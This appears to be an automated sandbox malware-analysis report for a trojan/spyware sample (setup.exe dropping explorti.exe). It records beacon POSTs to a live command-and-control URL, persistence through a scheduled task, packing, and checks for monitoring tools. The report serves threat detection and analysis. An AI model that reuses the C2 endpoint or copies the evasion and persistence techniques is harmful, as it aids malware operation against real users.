Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

10_2_002BBD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001756000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpN
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpa
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpo
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpt

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F3068	10_2_002F3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002BE440	10_2_002BE440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4CF0	10_2_002B4CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E7D83	10_2_002E7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F765B	10_2_002F765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4AF0	10_2_002B4AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F8720	10_2_002F8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F6F09	10_2_002F6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F777B	10_2_002F777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F2BD0	10_2_002F2BD0

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: setup.exe	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: explorti.exe.0.dr	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: setup.exe

ReversingLabs: Detection: 62%

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: setup.exe

Static file information: File size 1971200 > 1048576

Source: setup.exe

Static PE information: Raw size of rylhmesc is bigger than: 0x100000 < 0x1afc00

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 3.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 10.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b
Source: setup.exe	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b

PE file contains sections with non-standard names

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: rylhmesc
Source: setup.exe	Static PE information: section name: ofvhckac
Source: setup.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc
Source: explorti.exe.0.dr	Static PE information: section name: ofvhckac
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD84C push ecx; ret

10_2_002CD85F

Source: setup.exe	Static PE information: section name: entropy: 7.983148121720557
Source: setup.exe	Static PE information: section name: rylhmesc entropy: 7.952696111098041
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.983148121720557
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc entropy: 7.952696111098041

Drops PE files

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
